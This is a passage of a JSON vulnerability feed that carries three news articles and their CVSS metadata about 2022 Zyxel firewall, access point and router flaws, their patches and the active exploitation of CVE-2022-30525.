[LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-17T03:17:00", "type": "thn", "title": "Watch Out! Hackers Begin Exploiting Recent Zyxel Firewalls RCE Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22947", "CVE-2022-30525"], "modified": "2022-05-17T03:24:22", "id": "THN:EC08545A59E5E648DC06498AB3111060", "href": "https://thehackernews.com/2022/05/watch-out-hackers-begin-exploiting.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-13T08:22:49", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEggD1ZoPa8g3otDemX3Emk-hnZ1JUOT6k08_JU-qPKPgA5ozuhHPAH2ilfZXmp0XUB-dtrp3IwoPi29AlbEMd1ThBI2wl-xbDfY6r5tge_B87u9TFH-pXATZ0vgtM1xjuDnKB4bdaeYEnpfIq_qPap3wKQQiKNDK9OW6KiL7W3SgSCLiTCEZ-a_Pm8c/s728-e100/zyxel-firewall-vpn-hacking.jpg>)\n\nZyxel has moved to address a critical security vulnerability affecting Zyxel firewall devices that enables unauthenticated and remote attackers to gain arbitrary code execution.\n\n\"A command injection vulnerability in the CGI program of some firewall versions could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device,\" the company [said](<https://www.zyxel.com/support/Zyxel-security-advisory-for-OS-command-injection-vulnerability-of-firewalls.shtml>) in an advisory published Thursday.\n\nCybersecurity firm Rapid7, which [discovered](<https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/>) and reported the flaw on April 13, 2022, said that the weakness could permit a remote unauthenticated adversary to execute code as the \"nobody\" user on impacted appliances.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiBWDvHIM8VlYCmW0afGuPJAqaW9vEmnvaSGxjUSZB6g0K6GhfdBRK0xbBPWZGJg-_9NsmzSVLMysuK9h4SB0Pw43uU1Eedee4tCAsbEospDqIw3wfBUtck7A0HaWlHFqL0PbLBqLNghemBpxmIMZJrnE54PlluxL9kNRQ8-JjUYZfGqV4fvaRNDOpu/s728-e100/exploit.jpg>)\n\nTracked as [CVE-2022-30525](<https://nvd.nist.gov/vuln/detail/CVE-2022-30525>) (CVSS score: 9.8), the flaw impacts the following products, with patches released in version ZLD V5.30 -\n\n * USG FLEX 100(W), 200, 500, 700\n * USG FLEX 50(W) / USG20(W)-VPN\n * ATP series, and \n * VPN series\n\nRapid 7 noted that there are at least 16,213 vulnerable Zyxel devices exposed to the internet, making it a lucrative attack vector for threat actors to stage potential exploitation attempts.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiTUn6SFUHRlZ21X6uMj5JWiTMDFhM7KG5i5VYt57h-UmHw6VMs3oKjWQaR-PE20-_1XSJCyLOTFGz1ISPv4XPJxwnX7OfL6ebQxdP1KkjU1l3dKhNtSNL2kJ2i-ZO1K68csWm9G4t5sO50redafSpTiTJn0v25cDNyKyhWyjUpZ4kP78tbhiFenBpg/s728-e100/shodan.jpg>)\n\nThe cybersecurity firm also pointed out that Zyxel silently issued fixes to address the issue on April 28, 2022 without publishing an associated Common Vulnerabilities and Exposures ([CVE](<https://en.wikipedia.org/wiki/Common_Vulnerabilities_and_Exposures>)) identifier or a security advisory. Zyxel, in its alert, blamed this on a \"miscommunication during the disclosure coordination process.\"\n\n\"Silent vulnerability patching tends to only help active attackers, and leaves defenders in the dark about the true risk of newly discovered issues,\" Rapid7 researcher Jake Baines said.\n\nThe advisory comes as Zyxel addressed three different issues, including a command injection ([CVE-2022-26413](<https://www.zyxel.com/support/OS-command-injection-and-buffer-overflow-vulnerabilities-of-CPE-and-ONTs.shtml>)), a buffer overflow ([CVE-2022-26414](<https://www.zyxel.com/support/OS-command-injection-and-buffer-overflow-vulnerabilities-of-CPE-and-ONTs.shtml>)), and a local privilege escalation ([CVE-2022-0556](<https://www.zyxel.com/support/Zyxel-security-advisory-for-local-privilege-escalation-vulnerability-of-AP-Configurator.shtml>)) flaw, in its VMG3312-T20A wireless router and AP Configurator that could lead to arbitrary code execution.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.1, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.0, "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-13T06:24:00", "type": "thn", "title": "Zyxel Releases Patch for Critical Firewall OS Command Injection Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 5.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.7, "vectorString": "AV:A/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0556", "CVE-2022-26413", "CVE-2022-26414", "CVE-2022-30525"], "modified": "2022-05-13T08:16:16", "id": "THN:AC85E4A3174CEB4AD2B4BD1732D3B33C", "href": "https://thehackernews.com/2022/05/zyxel-releases-patch-for-critical.html", "cvss": {"score": 7.7, "vector": "AV:A/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-30T13:57:13", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEg3QX4n7urMiSZ3CPl3Q8ObGIVpejuIlXcIJPqXQMpRyh41lpIuH3UeNPhACL6d0VLO5o8FDHCq3a4UYhL43umF9ml6USckfW0QkWZQcRhhxJJ8YdXPlVYYnFUZe3RP9GxGRabs_aUzbpka4pApiOjOrhOkjfF3fkw8Rt0Q11Rq_aAD-YWORvciN1Xr/s728-e100/zz.jpg>)\n\nZyxel has released [patches](<https://www.zyxel.com/support/multiple-vulnerabilities-of-firewalls-AP-controllers-and-APs.shtml>) to address four security flaws affecting its firewall, AP Controller, and AP products to execute arbitrary operating system commands and steal select information.\n\nThe list of security vulnerabilities is as follows -\n\n * **CVE-2022-0734** \\- A cross-site scripting (XSS) vulnerability in some firewall versions that could be exploited to access information stored in the user's browser, such as cookies or session tokens, via a malicious script.\n * **CVE-2022-26531** \\- Several input validation flaws in command line interface (CLI) commands for some versions of firewall, AP controller, and AP devices that could be exploited to cause a system crash.\n * **CVE-2022-26532** \\- A command injection vulnerability in the \"[packet-trace](<https://kb.zyxel.com/KB/searchArticle!gwsViewDetail.action?articleOid=013652&lang=EN>)\" CLI command for some versions of firewall, AP controller, and AP devices that could lead to execution of arbitrary OS commands.\n * **CVE-2022-0910** \\- An authentication bypass vulnerability affecting select firewall versions that could permit an attacker to downgrade from two-factor authentication to one-factor authentication via an IPsec VPN client.\n\nWhile Zyxel has published software patches for firewalls and AP devices, hotfix for AP controllers affected by CVE-2022-26531 and CVE-2022-26532 can be obtained only by contacting the respective local Zyxel support teams.\n\nThe development comes as a critical command injection flaw in select versions of Zyxel firewalls ([CVE-2022-30525](<https://thehackernews.com/2022/05/watch-out-hackers-begin-exploiting.html>), CVSS score: 9.8) has come under active exploitation, prompting the U.S. Cybersecurity and Infrastructure Security Agency to add the bug to its Known Exploited Vulnerabilities Catalog.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-27T07:28:00", "type": "thn", "title": "Zyxel Issues Patches for 4 New Flaws Affecting AP, API Controller, and Firewall Devices", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0734", "CVE-2022-0910", "CVE-2022-26531", "CVE-2022-26532", "CVE-2022-30525"], "modified": "2022-05-27T10:10:02", "id": "THN:B287A447211203E6B749DBF0B90AF6C3", "href": "https://thehackernews.com/2022/05/zyxel-issues-patches-for-4-new-flaws.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}